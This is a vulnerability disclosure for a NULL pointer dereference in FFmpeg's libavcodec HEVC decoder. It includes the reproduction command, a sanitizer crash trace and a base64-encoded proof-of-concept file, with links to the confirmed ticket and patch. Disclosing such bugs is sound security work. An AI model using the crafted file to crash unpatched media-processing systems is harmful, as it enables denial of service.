|=----------------------------------------------------------------------------=| |=-----------------------=[ Vulnerability Disclosure ]=-----------------------=| |=--------------=[ FFmpeg/libavcodec: NULL Pointer Dereference ]=-------------=| |=----------------------------------------------------------------------------=| |=-----------------------=[ Tue 09 Feb 2021 22:30:30 ]=-----------------------=| |=----------=[ https://qiuhao.org/VD_FFmpeg_libavcodec_CWE-476.txt ]=---------=| |=----------------------------------------------------------------------------=| During fuzzing, we found a null pointer dereference (CWE-476) in the latest FFmpeg/libavcodec. -- [ Test Version ubuntu@VM:~/ffmpeg_sources/ffmpeg$ git log | head -n 4 commit 483cf7a1834edeb96cd8907521d2aa3530368081 Author: Paul B Mahol Date: Tue Feb 9 14:17:41 2021 +0100 -- [ Reproduce & ASAN Report ubuntu@VM:~$ ./bin/ffmpeg -i PoC ouput.mp4 ffmpeg version N-101018-g483cf7a183 Copyright (c) 2000-2021 the FFmpeg developers built with clang version 10.0.0-4ubuntu1 configuration: --prefix=/home/ubuntu/ffmpeg_build --pkg-config- flags=--static --extra-cflags='-I/home/ubuntu/ffmpeg_build/include -ggdb -fsanitize=address -fsanitize=undefined' --extra-ldflags='- L/home/ubuntu/ffmpeg_build/lib -fsanitize=address -fsanitize=undefined' --extra-libs='-lpthread -lm' --bindir=/home/ubuntu/bin --cc=clang -- cxx=clang++ --disable-ffplay --disable-ffprobe --disable-stripping -- assert-level=2 --enable-gpl --enable-gnutls --enable-libaom --enable- libass --enable-libfdk-aac --enable-libfreetype --enable-libmp3lame -- enable-libopus --enable-libvorbis --enable-libvpx --enable-libx264 -- enable-libx265 --enable-nonfree libavutil 56. 64.100 / 56. 64.100 libavcodec 58.121.100 / 58.121.100 libavformat 58. 67.100 / 58. 67.100 libavdevice 58. 11.103 / 58. 11.103 libavfilter 7.103.100 / 7.103.100 libswscale 5. 8.100 / 5. 8.100 libswresample 3. 8.100 / 3. 8.100 libpostproc 55. 8.100 / 55. 8.100 [mov,mp4,m4a,3gp,3g2,mj2 @ 0x61b000000080] overread end of atom 'stsd' by 808464282 bytes [mov,mp4,m4a,3gp,3g2,mj2 @ 0x61b000000080] stream 0, timescale not set [hevc @ 0x619000000f80] Invalid NAL unit size in extradata. [mov,mp4,m4a,3gp,3g2,mj2 @ 0x61b000000080] Failed to open codec in avformat_find_stream_info [hevc @ 0x619000000f80] Invalid NAL unit size in extradata. [mov,mp4,m4a,3gp,3g2,mj2 @ 0x61b000000080] Failed to open codec in avformat_find_stream_info [mov,mp4,m4a,3gp,3g2,mj2 @ 0x61b000000080] Could not find codec parameters for stream 0 (Video: hevc (Hvc1 / 0x31637648), none, 12336x12336): unspecified pixel format Consider increasing the value for the 'analyzeduration' (0) and 'probesize' (5000000) options Input #0, mov,mp4,m4a,3gp,3g2,mj2, from './PoC': Duration: N/A, bitrate: N/A Stream #0:0: Video: hevc (Hvc1 / 0x31637648), none, 12336x12336, 1 tbr, 1 tbn, 1 tbc Metadata: handler_name : 0000000000000 vendor_id : 0000 encoder : 0000000000000000000000000000000 [hevc @ 0x619000002d80] Invalid NAL unit size in extradata. libavcodec/hevcdec.c:3427:22: runtime error: applying zero offset to null pointer SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior libavcodec/hevcdec.c:3427:22 in libavcodec/hevcdec.c:3427:22: runtime error: load of null pointer of type 'HEVCLocalContext *' (aka 'struct HEVCLocalContext *') SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior libavcodec/hevcdec.c:3427:22 in AddressSanitizer:DEADLYSIGNAL ================================================================= ==29283==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000035bf0cd bp 0x0c4c00001224 sp 0x7fffbb338e40 T0) ==29283==The signal is caused by a READ memory access. ==29283==Hint: address points to the zero page. #0 0x35bf0cd in hevc_decode_free /home/ubuntu/ffmpeg_sources/ffmpeg/libavcodec/hevcdec.c:3427:19 #1 0x4687b6e in ff_frame_thread_free /home/ubuntu/ffmpeg_sources/ffmpeg/libavcodec/pthread_frame.c:712:13 #2 0x468c4d6 in ff_frame_thread_init /home/ubuntu/ffmpeg_sources/ffmpeg/libavcodec/pthread_frame.c:885:5 #3 0x4e0ee38 in avcodec_open2 /home/ubuntu/ffmpeg_sources/ffmpeg/libavcodec/utils.c:759:15 #4 0x57c0c4 in init_input_stream /home/ubuntu/ffmpeg_sources/ffmpeg/fftools/ffmpeg.c:2988:20 #5 0x57c0c4 in transcode_init /home/ubuntu/ffmpeg_sources/ffmpeg/fftools/ffmpeg.c:3751:20 #6 0x56f0d7 in transcode /home/ubuntu/ffmpeg_sources/ffmpeg/fftools/ffmpeg.c:4752:11 #7 0x56c7b2 in main /home/ubuntu/ffmpeg_sources/ffmpeg/fftools/ffmpeg.c:4986:9 #8 0x7f47a17ad0b2 in __libc_start_main (/lib/x86_64-linux- gnu/libc.so.6+0x270b2) #9 0x4251ad in _start (/home/ubuntu/bin/ffmpeg+0x4251ad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/ffmpeg_sources/ffmpeg/libavcodec/hevcdec.c:3427:19 in hevc_decode_free ==29283==ABORTING -- [ PoC ubuntu@VM:~$ base64 PoC MDAwMG1vb3YAAABsMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw MDAwMDAwdHJhawAAAFwwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAAHDAwMDAwMDAw MDAwMDAwMDAwMDAwMDAwMAAAAC1oZGxyMDAwMDAwMDB2aWRlMDAwMDAwMDAwMDAwMDAwMDAwMDAw MDAwMAAAAAEwMDAwAAAAAAAAABwwMDAwMDAwMDAwMDAAAAAMMDAwMDAwMDAwMDAwc3RzZDAwMDAA AAABMDAwMGVuY3YwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAA0YXZjQzAwMDAwMDAwMDAwMDAwMDAw MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMGZybWFIdmMx Update, Thu, 11 Feb 2021 16:22:16 -0000: Report Confirmed - https://trac.ffmpeg.org/ticket/9099 Patch Committed - https://github.com/FFmpeg/FFmpeg/commit/089706e009240ce3dc76f09ae9eee0ba98e65bd1